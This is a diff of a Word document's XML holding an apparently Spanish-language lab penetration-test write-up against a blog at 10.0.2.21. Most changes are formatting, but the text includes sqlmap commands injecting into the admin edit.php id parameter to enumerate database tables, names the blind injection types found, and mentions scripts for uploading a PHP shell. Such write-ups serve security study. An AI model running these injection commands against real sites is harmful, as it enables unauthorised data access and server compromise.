-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>y</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>del administrador y</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> entrar </w:t>
       </w:r>
@@ -1692,8 +1860,8 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>en el blog</w:t>
       </w:r>
@@ -1702,8 +1870,8 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> con este usuario.</w:t>
       </w:r>
@@ -1748,7 +1916,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1817,7 +1985,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13"/>
+                    <a:blip r:embed="rId14"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1869,7 +2037,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14"/>
+                    <a:blip r:embed="rId15"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1899,6 +2067,16 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1913,10 +2091,56 @@
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.- Una vez autenticados como administrador</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>.- Una vez autenticados como administrador, accedemos al apartado edit</w:t>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>ccedemos al apartado edit</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1983,15 +2207,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2000,8 +2215,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E6AE68F" wp14:editId="3D515111">
-            <wp:extent cx="5400040" cy="4253023"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E6AE68F" wp14:editId="29B7CC50">
+            <wp:extent cx="5398551" cy="2122190"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="1782498485" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
@@ -2015,7 +2230,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15"/>
+                    <a:blip r:embed="rId16"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2023,7 +2238,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5407267" cy="4258715"/>
+                      <a:ext cx="5435913" cy="2136877"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2040,96 +2255,6 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="28"/>
@@ -2144,7 +2269,6 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>6.- utilizamos sqlmap para extraer la máxima información:</w:t>
       </w:r>
     </w:p>
@@ -2178,7 +2302,15 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">la bases de datos </w:t>
+        <w:t>las bases</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de datos </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2207,9 +2339,9 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79C09808" wp14:editId="2BEAFDC0">
-            <wp:extent cx="4867628" cy="8102010"/>
-            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79C09808" wp14:editId="7AFCD266">
+            <wp:extent cx="4864735" cy="4930444"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
             <wp:docPr id="2116398071" name="Imagen 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -2222,7 +2354,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2230,7 +2362,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="4872896" cy="8110779"/>
+                      <a:ext cx="4934488" cy="5001139"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -2275,7 +2407,31 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>) sqlmap -u "http://10.0.2.21/admin/edit.php?id=</w:t>
+        <w:t>) sqlmap -u "http://10.0.2.21/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>edit.php?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>=</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2332,7 +2488,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2429,6 +2585,14 @@
         <w:lastRenderedPageBreak/>
         <w:t>c)</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tablas:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2461,7 +2625,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2499,6 +2663,14 @@
         <w:lastRenderedPageBreak/>
         <w:t>d)</w:t>
       </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>columnas:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2548,7 +2720,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId19"/>
+                    <a:blip r:embed="rId20"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -2692,14 +2864,34 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Boolean-based blind</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Boolean-based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2719,8 +2911,36 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Time-based blind</w:t>
-      </w:r>
+        <w:t>Time-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2832,6 +3052,7 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2840,6 +3061,7 @@
         </w:rPr>
         <w:t>comments</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2947,7 +3169,29 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>Posibles Scripts para RCE en la Tabla comments:</w:t>
+        <w:t xml:space="preserve">Posibles Scripts para RCE en la Tabla </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>comments</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2968,7 +3212,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Varias entradas en la tabla comments </w:t>
+        <w:t xml:space="preserve">Varias entradas en la tabla </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>comments</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2984,7 +3246,25 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t>scripts que pueden usarse para cargar una shell PHP en el servidor.</w:t>
+        <w:t xml:space="preserve">scripts que pueden usarse para cargar una </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>shell</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> PHP en el servidor.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3051,7 +3331,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20"/>
+                    <a:blip r:embed="rId21"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3090,7 +3370,118 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>sqlmap -u "http://10.0.2.21/admin/edit.php?id=1" --sql-query="SELECT table_name FROM information_schema.tables WHERE table_schema = 'blog';"</w:t>
+        <w:t>sqlmap -u "http://10.0.2.21/admin/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>edit.php?id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>=1" --</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>sql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-query="SELECT </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>table_name</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>information_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>schema.tables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>table_schema</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = 'blog';"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3128,7 +3519,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId21"/>
+                    <a:blip r:embed="rId22"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -3153,10 +3544,8 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3170,22 +3559,36 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Se inicia e intentarte conectarse al objetivo, pero es redirigido (HTTP 302) a la pagina </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId22" w:history="1">
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Se inicia e intentarte conectarse al objetivo, pero es redirigido (HTTP 302) a la </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>pagina</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId23" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hipervnculo"/>
             <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-            <w:b/>
-            <w:bCs/>
-            <w:sz w:val="28"/>
-            <w:szCs w:val="28"/>
+            <w:sz w:val="24"/>
+            <w:szCs w:val="24"/>
           </w:rPr>
           <w:t>http://10.0.2.21/admin/login.php</w:t>
         </w:r>
@@ -3193,10 +3596,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>. Identificándose tres tipos de inyección en el parámetro id:</w:t>
       </w:r>
@@ -3209,34 +3610,164 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>  Blind Boolean-Based: Determina la inyección basándose en respuestas verdaderas o falsas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>  Time-Based Blind: Usa retrasos temporales para deducir si la inyección es exitosa.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Blind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Boolean-Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>: Determina la inyección basándose en respuestas verdaderas o falsas.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
